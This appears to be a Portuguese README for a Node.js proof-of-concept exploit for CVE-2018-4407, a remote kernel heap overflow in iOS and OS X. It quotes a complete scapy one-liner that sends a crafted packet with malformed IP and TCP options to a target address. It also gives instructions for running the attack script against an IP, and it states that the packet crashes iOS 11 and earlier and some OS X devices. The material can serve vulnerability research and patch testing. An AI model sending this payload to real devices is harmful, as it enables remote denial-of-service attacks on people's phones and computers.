
Código de exploit PoC em Node.js para CVE-2018-4407
Código de exploração PoC em Node.js para CVE-2018-4407
Autor: Sam Decrock
Este script é baseado no script scapy fornecido por Zuk:
iOS 12 / OS X *Remote Kernel Heap Overflow (CVE-2018-4407) POC* in a tweet:
— Zuk (@ihackbanme) November 1, 2018
pip install scapy
sudo scapy
send(IP(dst=“Target IP“,options=[IPOption(“A”*8)])/TCP(dport=2323,options=[(19, “1"*18),(19, “2”*18)]))
Ele trava dispositivos com iOS 11 ou anterior, bem como algumas versões do OS X.
Para instalar os módulos necessários, execute:
npm install
Para executar, passe o endereço IP de destino como argumento:
node attack.js 192.168.1.20
Artigo original por Kevin Backhouse: https://lgtm.com/blog/apple_xnu_icmp_error_CVE-2018-4407